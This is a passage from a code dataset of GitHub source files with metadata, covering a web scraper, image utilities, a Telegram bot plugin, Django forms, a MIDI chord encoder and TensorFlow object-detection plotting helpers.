e_date:\r\n e_flag = True\r\n break\r\n\r\n if e_flag == True:\r\n print(\"Element already in file\")\r\n else:\r\n self.fm.write_file(title=e_title, date=e_date, link=e_link)\r\n new_element = {'title': e_title, 'date': e_date, 'link': e_link}\r\n new_element_list.append(new_element)\r\n print(\"---->New element added to the file\")\r\n\r\n print (\"The file has been saved\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()\r\n return(new_element_list)\r\n\r\n except:\r\n print (\"Element not found\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()", "repo_name": "Socterean/UT-bot4445", "sub_path": "helpers/ut_scrapper.py", "file_name": "ut_scrapper.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 16, "usage_type": "name"}, {"api_name": "helpers.file_manager.FileManager", "line_number": 18, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "36617698954", "text": "import numpy as np\nfrom skimage.measure import block_reduce\n\ndef crop_and_resize(img, target_size=32, zoom=1):\n small_side = int(np.min(img.shape) * zoom)\n reduce_factor = int(small_side / target_size)\n #print(reduce_factor)\n crop_size = target_size * reduce_factor\n mid = np.array(img.shape) // 2\n mid = mid.astype(np.int)\n half_crop = int(crop_size // 2)\n #print(half_crop)\n #half_crop = half_crop.astype(np.int)\n center = img[mid[0]-half_crop:mid[0]+half_crop,\n \tmid[1]-half_crop:mid[1]+half_crop]\n return 
block_reduce(center, (reduce_factor, reduce_factor), np.mean)\n", "repo_name": "sayands/deep-learning-projects", "sub_path": "SMILE-CNN/utils/crop_and_resize.py", "file_name": "crop_and_resize.py", "file_ext": "py", "file_size_in_byte": 607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.min", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 10, "usage_type": "attribute"}, {"api_name": "skimage.measure.block_reduce", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "12937801107", "text": "import os\n\nfrom babel import Locale\nfrom pyrogram.enums import ChatType\nfrom pyrogram.types import Message\n\nfrom ..bot import Client\nfrom ..database.chats import add_chat, get_chat\n\nLanguages: list[str] = [] # Loaded Locales\n\nfor file in os.listdir(\"twittergram/locales\"):\n if file not in (\"__init__.py\", \"__pycache__\"):\n Languages.append(file.replace(\".yaml\", \"\"))\n\n\n# This is the first plugin run to guarantee\n# that the actual chat is initialized in the DB.\n@Client.on_message(group=-1)\nasync def check_chat(client: Client, message: Message):\n chat = message.chat\n user = message.from_user\n\n try:\n language_code = str(Locale.parse(user.language_code, sep=\"-\"))\n except (AttributeError, TypeError):\n language_code: str = \"en_US\"\n\n if language_code not in Languages:\n language_code: str = \"en-us\"\n\n if user and await get_chat(user.id, ChatType.PRIVATE) is None:\n await add_chat(user.id, language_code, ChatType.PRIVATE)\n\n if await get_chat(chat.id, chat.type) is None:\n await add_chat(chat.id, language_code, chat.type)\n", "repo_name": "ruizlenato/twittergram", "sub_path": "twittergram/plugins/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 20, "usage_type": "name"}, {"api_name": "babel.Locale.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "babel.Locale", "line_number": 25, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 32, "usage_type": "name"}, {"api_name": "database.chats.add_chat", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 33, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 35, "usage_type": "call"}, {"api_name": "database.chats.add_chat", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.Client.on_message", "line_number": 19, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "12394356549", "text": "from django import forms\nfrom home.models import Book,Author,Genre\n\n\nclass BookForms(forms.Form):\n class Meta:\n book=Book\n fields=('name','genre','purchase_date','author')\n \n 
title=forms.ModelChoiceField(\n queryset=Book.objects.all(),\n empty_label='Title',widget=forms.Select(attrs={'name':'book','id':'book',\n 'class':'custom-select'})\n )\n\n author=forms.ModelChoiceField(\n queryset=Author.objects.all(),\n empty_label='Author',widget=forms.Select(attrs={'name':'author','id':'author',\n 'class':'custom-select'})\n )\n purchase_date = forms.DateField(label='',widget=forms.DateInput(\n attrs={'placeholder':'Purchase_Date','name':'date','id':'date','class':'form-control'}))\n \n\n genre=forms.ModelMultipleChoiceField(queryset=Genre.objects.all(), widget=forms.CheckboxSelectMultiple)\n\nclass SearchForm(forms.Form):\n q=forms.CharField(label='',\n widget=forms.TextInput(attrs={'placeholder':'search','maxlength':'30',\n 'class':'form-control'}))\n", "repo_name": "dikshaRaj/Diksha", "sub_path": "home/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "home.models.Book", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "home.models.Book.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "home.models.Book.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "home.models.Book", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "home.models.Author.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "home.models.Author.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "home.models.Author", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "home.models.Genre.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "home.models.Genre.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "home.models.Genre", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", 
"line_number": 29, "usage_type": "name"}]} +{"seq_id": "14544952438", "text": "import contextlib\nimport json\nimport os\nimport numpy as np\nfrom numba.core.errors import NumbaDeprecationWarning\nimport warnings\n\nfrom midi import Midi\nfrom constants import VAMP_PATH, CHORD_ENCODINGS_PATH\n\nos.environ[\"VAMP_PATH\"] = VAMP_PATH\nwarnings.filterwarnings(\"ignore\", category=NumbaDeprecationWarning)\n\nfrom chord_extractor.extractors import Chordino # noqa\n\n\nclass Style:\n encoding_type = \"style\"\n\n def __init__(self, midi: Midi):\n self.midi = midi\n\n # File that stores encodings of chords based on vocabulary\n if not os.path.exists(CHORD_ENCODINGS_PATH):\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([1, {\"N\": 0}], f)\n\n with open(CHORD_ENCODINGS_PATH, \"r\") as f:\n self.num_chords, self.vocab = json.load(f)\n\n # Silence output from Chordino\n with open(os.devnull, \"w\") as devnull:\n with contextlib.redirect_stdout(devnull):\n self.extract_style()\n self.generate_encoding()\n\n def extract_style(self):\n chordino = Chordino()\n conversion_file_path = chordino.preprocess(self.midi.filepath)\n\n chords = chordino.extract(conversion_file_path)\n self.chords = [(c.chord, c.timestamp) for c in chords]\n\n def generate_encoding(self):\n # One hot encodes all chords in the midi\n self.encoding = np.zeros((self.midi.piano_roll.shape[1], self.num_chords))\n\n for (chord, t1), (chord, t2) in zip(self.chords, self.chords[1:]):\n if chord not in self.vocab:\n self.vocab[chord] = self.num_chords\n self.num_chords += 1\n\n self.encoding = np.hstack(\n (self.encoding, np.zeros((self.encoding.shape[0], 1)))\n )\n\n start = self.midi.time_to_tick(t1)\n end = self.midi.time_to_tick(t2)\n index = self.vocab[chord]\n\n self.encoding[start:end, index] = 1\n\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([self.num_chords, self.vocab], f)\n", "repo_name": "VikaasVarma/Music-Style-Transfer", "sub_path": "embeddings/style.py", "file_name": "style.py", "file_ext": "py", "file_size_in_byte": 2066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "constants.VAMP_PATH", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "numba.core.errors.NumbaDeprecationWarning", "line_number": 12, "usage_type": "name"}, {"api_name": "midi.Midi", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 25, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 28, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "os.devnull", "line_number": 32, "usage_type": "attribute"}, {"api_name": "contextlib.redirect_stdout", "line_number": 33, "usage_type": "call"}, {"api_name": "chord_extractor.extractors.Chordino", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", 
"line_number": 54, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 63, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "22116161809", "text": "import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport json\nfrom six import BytesIO\nfrom PIL import Image\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib.patches import Ellipse, Rectangle\nfrom object_detection.utils import visualization_utils as viz_utils\n\n\ndef load_json_images_annotations(filename: str, label_dict: dict, subdir: str = \".\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n single json annotation file.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images referred to in the annotation file.\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n annotations = json.load(f)\n\n image_list = []\n box_list = []\n label_list = []\n\n for ii, entry in enumerate(annotations.values()):\n\n image_file = entry['filename']\n image_file = os.path.join(subdir, image_file)\n # print(image_file)\n image_list.append(image_file)\n # get image size:\n with Image.open(image_file) as im:\n img_width, img_height = im.size\n\n boxes = []\n labels = []\n for region in entry['regions']:\n assert region['shape_attributes']['name'] == 'rect'\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n width = region['shape_attributes']['width']\n height = region['shape_attributes']['height']\n # read class label:\n label = region['region_attributes']['class']\n\n xmin = x / img_width\n ymin = y / img_height\n xmax = (x + width) / img_width\n ymax = (y + height) / img_height\n\n boxes.append([ymin, xmin, ymax, xmax])\n labels.append(label_dict[label])\n\n box_list.append(np.array(boxes, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, box_list, label_list\n\n\ndef load_json_images_annotations_from_list(filename: str, label_dict: dict, subdir: str = \".\",\n annot_suffix: str = \".json\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n list of image files and corresponding json annotation files.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images and the corresponding annotation files.\n :param annot_suffix: str\n The suffix of the annotation files such as: image_file='example.jpeg' -> annotation_file='example'\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n files = np.loadtxt(f, dtype='str')\n\n image_list = []\n annot_list = []\n 
label_list = []\n\n for ii, image_file in enumerate(files):\n\n image_list.append(os.path.join(subdir, image_file))\n\n annot_file = image_file.strip('.jpg').strip('.jpeg').strip('.png') + annot_suffix\n with open(os.path.join(subdir, annot_file)) as af:\n annotations = json.load(af)\n\n # skip uppermost dict level with only one entry:\n annotations = list(annotations.values())[0]\n\n assert annotations['filename'] == image_file, \"Image filename `{}` differs from annotation file attribute `{}`\" \\\n .format(image_file, annotations['filename'])\n\n annot = []\n labels = []\n for region in annotations['regions']:\n\n assert region['shape_attributes']['name'] == 'rect' or region['shape_attributes']['name'] == 'ellipse'\n\n if region['shape_attributes']['name'] == 'rect':\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n w = region['shape_attributes']['width']\n h = region['shape_attributes']['height']\n rx = w / 2.\n ry = h / 2.\n cx = x + rx\n cy = y + ry\n theta = 0.\n # read class label:\n label = region['region_attributes']['class']\n\n # overwrite ellipse entry to rectangle entry in json:\n region['shape_attributes'] = \\\n {'name': 'ellipse', 'cx': round(cx), 'cy': round(cy), 'rx': rx, 'ry': ry, 'theta': theta}\n\n else:\n # read ellipse parameters:\n cx = region['shape_attributes']['cx']\n cy = region['shape_attributes']['cy']\n rx = region['shape_attributes']['rx']\n ry = region['shape_attributes']['ry']\n theta = region['shape_attributes']['theta']\n # read class label:\n label = region['region_attributes']['class']\n\n annot.append([cx, cy, rx, ry, theta])\n labels.append(label_dict[label])\n\n annot_list.append(np.array(annot, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, annot_list, label_list\n\n\ndef load_image_into_numpy_array(filename):\n \"\"\"\n Load an image from file into a numpy array of shape\n (height, width, channels), where channels=3 for RGB.\n\n :param filename: str\n Path to th input file.\n :return: numpy.ndarray, uint8\n The array with the input image.\n \"\"\"\n img_data = tf.io.gfile.GFile(filename, 'rb').read()\n image = Image.open(BytesIO(img_data))\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef plot_detections(image_np, boxes, classes, scores, category_index, min_score_thresh=0.8, image_name=None):\n \"\"\"\n Wrapper function for the object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array()\n method.\n\n :param image_np: numpy.ndarray, uint8\n Array with the input image with shape (height, width, 3).\n :param boxes: numpy.ndarray\n Array with the bounding box parameters of shape (n_objects, 4).\n :param classes: numpy.ndarray\n Array with the class labels of shape (n_objects, ).\n Indices must be 1-based, and must match the keys in `category_index`.\n :param scores: numpy.ndarray\n Array with the detection scores. 
If None, groundtruth boxes are assumed,\n and all boxes will be plotted as black with neither classes nor scores.\n :param category_index: dict\n Dictionary of category dictionaries (each holding a category index `id` and category name `name`)\n keyed by category indices.\n :param min_score_thresh: float\n The minimum required score for a box to be shown.\n :param image_name: str\n Name of the output image file.\n \"\"\"\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, boxes, classes, scores, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh)\n if image_name is not None:\n plt.imsave(image_name, image_np_annotated)\n else:\n plt.imshow(image_np_annotated)\n\n\ndef plot_images_with_boxes(images, gt_boxes, gt_labels,\n pred_boxes, pred_labels, pred_scores,\n category_index, label_id_offset,\n figname='image_list_with_boxes', figformat='jpg',\n min_score_thresh=0.5,\n max_boxes_to_draw=20,\n skip_scores=False, skip_labels=False):\n \"\"\"\n Plot a list / batch of images with the ground truth and\n (optionally) predicted boxes (with labels and scores) overlaid.\n\n :param images: array-like with tf.Tensor elements of shape (height, width, channels)\n OR tf.Tensor with batch dimension of shape (batch_size, height, width, channels)\n The list or batch of image tensors to be plotted.\n :param gt_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n The list or batch of ground truth boxes to be plotted.\n :param gt_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n The list or batch of ground truth labels.\n :param pred_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n OR None\n The list or batch of predicted boxes to be plotted. If None, only the ground truth boxes will be plotted.\n :param pred_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n OR None\n The list or batch of predicted labels. If None, only the ground truth boxes will be plotted.\n :param pred_scores: array-like with tf.Tensor elements of shape (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes)\n OR None\n The list or batch of prediction scores. If None, only the ground truth boxes will be plotted.\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param figname: str\n The path and name of the output figure.\n :param figformat: str\n File format of the output figure. Only valid pyplot output formats are allowed.\n :param min_score_thresh: float\n The minimum detection score threshold for a predicted object to be plotted.\n :param max_boxes_to_draw: int OR None\n The maximum number of detection boxes to be plotted. 
If None, draw all boxes.\n    :param skip_scores: boolean\n        Whether to skip the detection score when drawing a single detection.\n    :param skip_labels: boolean\n        Whether to skip the class label when drawing a single detection.\n    :return:\n    \"\"\"\n\n    n_img = len(images)\n    image_shape = tf.shape(images[0]).numpy()\n    scaler = MinMaxScaler(feature_range=(0, 255))\n\n    ncols = 3\n    nrows = int(np.ceil(n_img / ncols))\n    if nrows == 1:\n        ncols = n_img\n    fig = plt.figure(figsize=(ncols * 10, 10 * nrows))\n    for ii in range(n_img):\n\n        plt.subplot(nrows, ncols, ii + 1)\n\n        image_np = scaler.fit_transform(images[ii].numpy().reshape(-1, 1)). \\\n            reshape(image_shape).astype('int32')\n\n        gt_boxes_np = gt_boxes[ii].numpy()\n\n        # check if ground truth labels are one-hot encoded:\n        if tf.shape(gt_labels[0]).numpy().shape[0] > 1:\n            gt_labels_np = tf.argmax(gt_labels[ii], axis=1).numpy().flatten().astype('int32')\n        else:\n            gt_labels_np = gt_labels[ii].numpy().astype('int32')\n\n        image_np_annotated = image_np.copy()\n        image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n            image_np_annotated, gt_boxes_np, gt_labels_np + label_id_offset, None, category_index,\n            use_normalized_coordinates=True,\n            max_boxes_to_draw=max_boxes_to_draw, groundtruth_box_visualization_color='black', line_thickness=1)\n\n        if None not in (pred_boxes, pred_labels, pred_scores):\n\n            pred_boxes_np = pred_boxes[ii].numpy()\n\n            # check if predicted labels are one-hot encoded:\n            if tf.shape(pred_labels[0]).numpy().shape[0] > 1:\n                pred_labels_np = tf.argmax(pred_labels[ii], axis=1).numpy().flatten().astype('int32')\n            else:\n                pred_labels_np = pred_labels[ii].numpy().astype('int32')\n\n            pred_scores_np = pred_scores[ii].numpy()\n\n            image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n                image_np_annotated, pred_boxes_np, pred_labels_np + label_id_offset, pred_scores_np, category_index,\n                use_normalized_coordinates=True, min_score_thresh=min_score_thresh,\n                max_boxes_to_draw=max_boxes_to_draw, line_thickness=1,\n                skip_scores=skip_scores, skip_labels=skip_labels)\n\n        plt.imshow(image_np_annotated)\n\n    plt.tight_layout()\n    plt.savefig(figname + '.' + figformat, format=figformat)\n    fig.clf()\n    plt.close(fig)\n    del fig\n\n\ndef plot_image_batch_with_boxes(dataset,\n                                category_index,\n                                label_id_offset,\n                                rescale: bool = True,\n                                figname: str = 'image_batch_with_boxes',\n                                figformat: str = 'jpg'):\n    \"\"\"\n    Plots a batch of images with their corresponding object bounding boxes and labels.\n\n    :param dataset: tf.Dataset\n        A batched tensorflow dataset object containing the entries:\n        image, image shape, boxes, labels\n    :param category_index: dict\n        A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n        keyed by category indices.\n    :param label_id_offset: int\n        The offset of label id's with respect to a labelling scheme that starts with 0.\n    :param rescale: bool\n        Whether to rescale the image into the [0, 255] range.\n    :param figname: str\n        The filename for the output figure.\n    :param figformat: str\n        The format of the output figure. 
Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n\n image_list_np = []\n boxes_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, boxes, labels in dataset.unbatch():\n\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n boxes_list.append(boxes.numpy())\n labels_list.append(tf.argmax(labels.to_tensor(), axis=1).numpy().flatten().astype('int32'))\n\n n_img = len(image_list_np)\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n fig = plt.figure(figsize=(30, 10 * nrows))\n\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np_annotated = image_list_np[ii].copy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated,\n boxes_list[ii],\n labels_list[ii] + label_id_offset,\n np.ones([boxes_list[ii].shape[0]]),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=None,\n groundtruth_box_visualization_color='black',\n skip_scores=True,\n skip_labels=False,\n line_thickness=2)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_ellipses(data_batch, category_index, ell2box=False, rescale=True,\n figname='image_batch_with_ellipses', figformat='pdf'):\n \"\"\"\n Plots a batch of images with their corresponding object annotation ellipses and labels.\n\n :param data_batch: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, ellipses, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param ell2box: bool\n Whether to also plot the bounding rectangles of the ellipses.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. 
Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n image_list_np = []\n shapes_list = []\n ellipse_list = []\n box_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, ellipses, labels in data_batch.unbatch():\n # image_list_np.append(img.numpy().astype('int32'))\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n # print(img_shape)\n shapes_list.append(img_shape.numpy().astype('int32'))\n ellipse_list.append(ellipses.numpy())\n labels_list.append(labels.numpy().astype('int32'))\n if ell2box:\n ellipses = ellipses.to_tensor()\n boxes = bounding_rectagle(ellipses)\n box_list.append(boxes.numpy())\n\n for ii, image_np in enumerate(image_list_np):\n\n dpi = 400\n\n fig = plt.figure(figsize=(20, 10), dpi=dpi, tight_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n _ = ax.imshow(image_np, aspect=1, interpolation='none')\n\n plt.rcParams[\"figure.autolayout\"] = True\n\n # plt.subplot(nrows, ncols, ii + 1)\n plot_gt_ellipses(ax, ellipse_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n if box_list:\n plot_gt_boxes(ax, box_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n\n cy = int(image_np.shape[0] // 2)\n cx = int(image_np.shape[1] // 2)\n\n # print(shapes_list[ii], cy, cx)\n plot_bb(ax, cx, cy, shapes_list[ii])\n # print(annot_list[ii])\n # print(labels_list[ii])\n\n if figname is not None:\n plt.savefig(figname + '_' + str(ii + 1) + '.' + figformat, format=figformat, dpi=dpi)\n else:\n plt.show()\n\n\ndef plot_bb(axis, cx, cy, shape):\n height, width, channels = shape\n\n rr = Rectangle(xy=(cx - width / 2, cy - height / 2), width=width, height=height)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('green')\n rr.set_alpha(1)\n rr.set_linewidth(4)\n rr.set_fill(False)\n\n\ndef bounding_rectagle(ellipse_parameters):\n \"\"\"\n Compute the parameters of the bounding rectangles for a set of ellipses.\n\n :param ellipse_parameters: tf.Tensor\n Tensor of shape (n_objects, 5) with the ellipse parameters:\n x_center, y_center, x_radius, y_radius, rotation angle.\n :return: tf.Tensor\n Tensor of shape (n_objects, 4) with the resulting bounding box parameters:\n ymin, xmin, ymax, xmax\n \"\"\"\n cx = ellipse_parameters[:, 0]\n cy = ellipse_parameters[:, 1]\n rx = ellipse_parameters[:, 2]\n ry = ellipse_parameters[:, 3]\n theta = ellipse_parameters[:, 4]\n\n pi = tf.constant(np.pi)\n epsilon = 1e-10\n\n tx1 = tf.atan(-1 * (ry * tf.sin(theta)) / (rx * tf.cos(theta) + epsilon))\n tx2 = tx1 + pi\n # print(tx1, tx2)\n\n x1 = rx * tf.cos(theta) * tf.cos(tx1) - ry * tf.sin(theta) * tf.sin(tx1)\n x2 = rx * tf.cos(theta) * tf.cos(tx2) - ry * tf.sin(theta) * tf.sin(tx2)\n # print(x1, x2)\n\n # ty1 = np.arctan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty1 = tf.atan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty2 = ty1 + pi\n # print(ty1, ty2)\n\n y1 = rx * tf.sin(theta) * tf.cos(ty1) + ry * tf.cos(theta) * tf.sin(ty1)\n y2 = rx * tf.sin(theta) * tf.cos(ty2) + ry * tf.cos(theta) * tf.sin(ty2)\n # print(y1, y2)\n\n half_width = tf.reduce_max(tf.stack((x1, x2), axis=0), axis=0)\n half_height = tf.reduce_max(tf.stack((y1, y2), axis=0), axis=0)\n # tf.print(half_width)\n # tf.print(half_width.shape)\n\n ymin = cy - half_height\n xmin = cx - half_width\n ymax = cy + half_height\n xmax = cx + half_width\n\n 
